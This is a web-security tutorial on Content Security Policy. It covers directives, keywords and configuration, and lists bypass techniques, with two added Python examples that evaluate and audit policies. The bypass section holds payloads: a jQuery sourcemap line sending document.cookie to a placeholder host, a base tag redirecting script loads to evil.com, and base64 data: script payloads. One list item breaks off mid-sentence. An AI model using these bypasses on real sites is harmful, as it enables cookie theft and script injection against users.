4.2.4. CSP
4.2.4.1. What is CSP?
Content Security Policy (CSP) is, as the name suggests, a specification concerned with content security: it defines which resources the current page is allowed to load, and thereby reduces the chance of XSS.
4.2.4.2. Configuration
A CSP policy can be delivered through an HTTP header or a meta element.
The header exists in three variants:
Content-Security-Policy (Google Chrome)
X-Content-Security-Policy (Firefox)
X-WebKit-CSP (WebKit-based browsers, e.g. Safari)
HTTP header :
"Content-Security-Policy:" policy
"Content-Security-Policy-Report-Only:" policy
The Content-Security-Policy header declares which resources are allowed, while Content-Security-Policy-Report-Only lets the server monitor a policy (violations are reported but not enforced). When several headers define a policy, the one defined first takes precedence.
HTML Meta :
<meta http-equiv="content-security-policy" content="policy">
<meta http-equiv="content-security-policy-report-only" content="policy">
4.2.4.2.1. Directive Description
| Directive | Description |
|---|---|
| default-src | Defines the default resource loading policy |
| connect-src | Defines the loading policy for Ajax, WebSocket and similar connections |
| font-src | Defines the font loading policy |
| frame-src | Defines the frame loading policy |
| img-src | Defines the image loading policy |
| media-src | Defines the loading policy for <audio>, <video> and other media resources |
| object-src | Defines the loading policy for <applet>, <embed>, <object> and other plugin resources |
| script-src | Defines the JS loading policy |
| style-src | Defines the CSS loading policy |
| base-uri | Defines the policy for the <base> root URL; does not fall back to default-src |
| sandbox | Applies a sandbox to the resource, e.g. with the value allow-forms |
| report-uri | URI to which violation reports are submitted, e.g. /report-uri |
4.2.4.2.2. Keywords
| Keyword | Description | Example |
|---|---|---|
| * | Allow loading from any URL, except the data:, blob: and filesystem: schemes | img-src * |
| 'none' | Disallow loading resources from any URL | object-src 'none' |
| 'self' | Only same-origin resources can be loaded | img-src 'self' |
| data: | Resources can be loaded through the data: scheme | img-src 'self' data: |
| domain.example.com | Resources can only be loaded from the given domain | img-src domain.example.com |
| *.example.com | Resources can be loaded from any subdomain of example.com | img-src *.example.com |
| https://cdn.com | Resources can only be loaded over HTTPS from the given domain | img-src https://cdn.com |
| https: | Resources can only be loaded over HTTPS, from any domain | img-src https: |
| 'unsafe-inline' | Allow inline code to execute, such as style attributes, onclick handlers or inline script tags | script-src 'unsafe-inline' |
| 'unsafe-eval' | Allow unsafe code-execution methods such as JavaScript's eval() | script-src 'unsafe-eval' |
| 'nonce-<base64-value>' | Use a random nonce; only tags whose nonce attribute matches may load | script-src 'nonce-bm9uY2U=' |
| '<hash-algo>-<base64-value>' | Allow code blocks whose hash matches to execute | script-src 'sha256-<base64-value>' |
4.2.4.2.3. Configuration example
Allow execution of inline JS code, but do not allow loading of external resources:
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';
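To make the directive and keyword semantics above concrete, here is an added example (not code from the original notes) that parses a policy string and decides whether a given directive would let a resource URL load. It implements the source forms from the keyword table, the default-src fallback for fetch directives, and the fact that base-uri has no fallback. The page origin, hosts and policies used in it are constructed for the example; nonces and hashes govern inline code rather than URLs and are treated as non-matching.

```python
"""Evaluator for CSP fetch directives (added example, not from the original notes)."""
from urllib.parse import urlsplit

# Directives that fall back to default-src when absent; base-uri is deliberately not among them.
FALLS_BACK_TO_DEFAULT = {"connect-src", "font-src", "frame-src", "img-src",
                         "media-src", "object-src", "script-src", "style-src"}
DEFAULT_PORT = {"http": 80, "https": 443, "ws": 80, "wss": 443}


def parse_csp(header: str) -> dict:
    """'a x; b y z;' -> {'a': ['x'], 'b': ['y', 'z']}; a repeated directive keeps its first value."""
    policy = {}
    for chunk in header.split(";"):
        parts = chunk.split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def _port(u):
    """Explicit port, or the scheme's default port (None for non-network schemes)."""
    return u.port or DEFAULT_PORT.get(u.scheme)


def _host_matches(pattern: str, host: str) -> bool:
    """*.example.com matches any subdomain but not example.com itself."""
    if pattern.startswith("*."):
        return host.endswith(pattern[1:]) and host != pattern[2:]
    return host == pattern


def source_matches(expr: str, url: str, page_origin: str) -> bool:
    """Does a single source expression from the keyword table permit url?"""
    u, p = urlsplit(url), urlsplit(page_origin)
    if expr == "'none'":
        return False
    if expr == "'self'":
        return (u.scheme, u.hostname, _port(u)) == (p.scheme, p.hostname, _port(p))
    if expr.startswith("'"):        # 'unsafe-inline', 'nonce-...', 'sha256-...' are not URL sources
        return False
    if expr == "*":                 # data:, blob: and filesystem: must be listed explicitly
        return u.scheme in DEFAULT_PORT
    if expr.endswith(":"):          # scheme source such as https: or data:
        return u.scheme == expr[:-1]
    # host source: [scheme://]host[:port], where host may start with "*."
    scheme, _, rest = expr.rpartition("://")
    if scheme:
        ok_schemes = {scheme}
    else:                           # no scheme given: the page's scheme (an http page may also use https)
        ok_schemes = {"http", "https"} if p.scheme == "http" else {p.scheme}
    host, _, port = rest.partition(":")
    if u.scheme not in ok_schemes or not _host_matches(host.lower(), (u.hostname or "").lower()):
        return False
    if port and port != "*":
        return _port(u) == int(port)
    return True


def is_allowed(header: str, directive: str, url: str, page_origin: str) -> bool:
    """True if the policy lets `directive` load `url` from a page at `page_origin`."""
    policy = parse_csp(header)
    sources = policy.get(directive)
    if sources is None and directive in FALLS_BACK_TO_DEFAULT:
        sources = policy.get("default-src")
    if sources is None:             # no governing directive: the browser does not restrict it
        return True
    return any(source_matches(s, url, page_origin) for s in sources)


if __name__ == "__main__":
    ORIGIN = "https://app.example.com"   # constructed page origin
    POLICY = ("default-src 'self'; img-src 'self' data: *.cdn.example; "
              "script-src 'self' https://cdn.com")
    for directive, url in [("img-src", "https://static.cdn.example/a.png"),
                           ("img-src", "http://static.cdn.example/a.png"),
                           ("script-src", "https://cdn.com/jquery.js"),
                           ("connect-src", "https://api.other.example/"),
                           ("base-uri", "https://evil.example/")]:
        verdict = "allowed" if is_allowed(POLICY, directive, url, ORIGIN) else "blocked"
        print(f"{directive:12} {url:40} {verdict}")
```

The last case in the demo is the one worth remembering: with no base-uri directive the check returns allowed even though default-src is 'self', because base-uri never inherits from default-src.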
4.2.4.3. Bypass
4.2.4.3.1. Preloading
To improve the user experience and make the browser more efficient, browsers have a preloading feature that generally uses the browser's idle time to load specified content and cache it. The technique is subdivided into DNS-prefetch, subresource, prefetch, preconnect and prerender.
In HTML5, page preloading is specified with the rel attribute of the link tag. If the CSP header contains unsafe-inline, a request to the outside world can be made through preloading, for example:
<!-- preloading page -->
<link rel='prefetch' href='http://xxxx'><!-- firefox -->
<link rel='prerender' href='http://xxxx'><!-- chrome -->
<!-- preloading image -->
<link rel='prefetch' href='http://xxxx/x.jpg'>
<!-- DNS prefetch -->
<link rel="dns-prefetch" href="http://xxxx">
<!-- preloading specific file types -->
<link rel='preload' href='//xxxxx/xx.js'><!-- chrome -->
In addition, not all pages can be preloaded; the preload operation is blocked in the following cases:
- The URL contains downloadable resources
- The page contains audio or video
- Ajax requests using POST, PUT or DELETE
- HTTP authentication
- HTTPS pages
- Malware pages
- Popup pages
- Pages that consume a lot of resources
- Chrome developer tools are open
4.2.4.3.2. MIME Sniff
For example, suppose the CSP forbids loading scripts cross-site but allows loading images cross-site. An image file that contains script is then served and referenced as <script src='http://xxx.com/xx.jpg'>. Here CSP regards the resource as an image and the check is bypassed; if the website does not return the correct MIME type, the browser will guess and may load the image as a script.
4.2.4.3.3. 302 Jump
Bypassing CSP through a 302 redirect is subject to the following limitations:
- The redirecting host (the springboard) must be within an allowed domain.
- The host part of the file being loaded must match the host part of the allowed domain.
4.2.4.3.4. iframe
When code execution is possible, a frame can be created whose source is a static file such as a CSS or JS file. When the server is misconfigured, that frame carries no CSP, and a further frame can then be created inside it to achieve the bypass. In the same way, links such as ../../../ or /%2e%2e%2f that may trigger a server error page can serve the same purpose.
4.2.4.3.5. base-uri
When script-src uses a nonce or is unrestricted, and base-uri is unrestricted, the root URL can be changed with a base tag to bypass the policy; http://evil.com/main.js is then loaded as follows:
<base href="http://evil.com/">
<script nonce="correct value" src="/main.js"></script>
4.2.4.3.6. Others
- location bypass
- When SVG files can be uploaded, bypass same-origin sites with malicious SVGs
- When there is a CRLF vulnerability and the controllable point lies above the CSP header, the injection into the HTTP response can affect CSP parsing
- CDN bypass: if the website trusts a CDN, the static resources of that CDN can be used to bypass the policy
- Angular versions >=1.5.0 and <1.5.9 have a vulnerability (see the Git pull request)
- jQuery sourcemap:
document.write(`<script> //@ sourceMappingURL=http://xxxx/`+document.cookie+`<\/script>`);
- The ping attribute of the <a> tag
- For Firefox:
<META HTTP-EQUIV="refresh" CONTENT="0; url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnSWhhdmVZb3VOb3cnKTs8L3NjcmlwdD4=">
<link rel="import" />
<meta http-equiv="refresh" content="0; url=http://...." />
- When only script-src is restricted:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
- When restricting only
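The bypass sections above share a small set of preconditions on the server's headers: a script-src that is unrestricted or carries 'unsafe-inline', a nonce-based or unrestricted script-src with no base-uri directive (base-uri section), an object-src left unrestricted when only script-src is set (the <object data="data:..."> item), and a missing X-Content-Type-Options: nosniff header (MIME Sniff section). The following is an added auditing example, not code from the original notes, that checks a response's headers for exactly those conditions; the header sets and policies in it are constructed for the example.

```python
"""Response-header auditor for the CSP weaknesses discussed in the bypass sections
(added example, not part of the original notes)."""


def parse_csp(header: str) -> dict:
    """'a x; b y z' -> {'a': ['x'], 'b': ['y', 'z']}; a repeated directive keeps its first value."""
    policy = {}
    for chunk in header.split(";"):
        parts = chunk.split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def effective(policy: dict, directive: str):
    """Sources governing a directive after the default-src fallback.
    base-uri has no fallback; None means the directive is unrestricted."""
    if directive in policy:
        return policy[directive]
    if directive != "base-uri":
        return policy.get("default-src")
    return None


def audit_headers(headers: dict) -> list:
    """Return human-readable findings; an empty list means none of the checks fired."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy")
    if csp is None:
        return ["no Content-Security-Policy header: nothing is restricted"]
    policy = parse_csp(csp)
    findings = []

    script = effective(policy, "script-src")
    unrestricted = script is None or "*" in script
    uses_nonce = bool(script) and any(s.startswith("'nonce-") for s in script)
    uses_hash = bool(script) and any(s.startswith(("'sha256-", "'sha384-", "'sha512-")) for s in script)
    if unrestricted:
        findings.append("script-src: unrestricted, scripts may load from any host")
    elif "'unsafe-inline'" in script and not (uses_nonce or uses_hash):
        # with a nonce or hash present browsers ignore 'unsafe-inline', so only the bare form is flagged
        findings.append("script-src: 'unsafe-inline' lets injected inline scripts and event handlers run")
    # the precondition named in the base-uri section: nonce-based or unrestricted script-src, no base-uri
    if (unrestricted or uses_nonce) and "base-uri" not in policy:
        findings.append("base-uri: missing, a <base href> tag can redirect relative script src values")

    obj = effective(policy, "object-src")
    if obj is None:
        findings.append("object-src: unrestricted, plugin content such as <object data=...> is not limited")
    elif "data:" in obj:
        findings.append("object-src: allows data:, an inline <object> document can carry script")

    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing, a mis-typed response may be sniffed and run as script")
    return findings


if __name__ == "__main__":
    # constructed header sets: the page's own nonce example on its own, and a tightened version
    for name, hdrs in [("nonce only", {"Content-Security-Policy": "script-src 'nonce-bm9uY2U='"}),
                       ("tightened", {"Content-Security-Policy": "default-src 'self'; script-src 'nonce-bm9uY2U='; "
                                                                  "object-src 'none'; base-uri 'self'",
                                      "X-Content-Type-Options": "nosniff"})]:
        print(name, audit_headers(hdrs) or ["no findings"])
```

Run against the configuration example from earlier (default-src 'self'; script-src 'self' 'unsafe-inline';) the auditor reports only the 'unsafe-inline' finding: object-src is covered by the default-src fallback, and the base-uri check stays quiet because that bypass needs a nonce-based or unrestricted script-src.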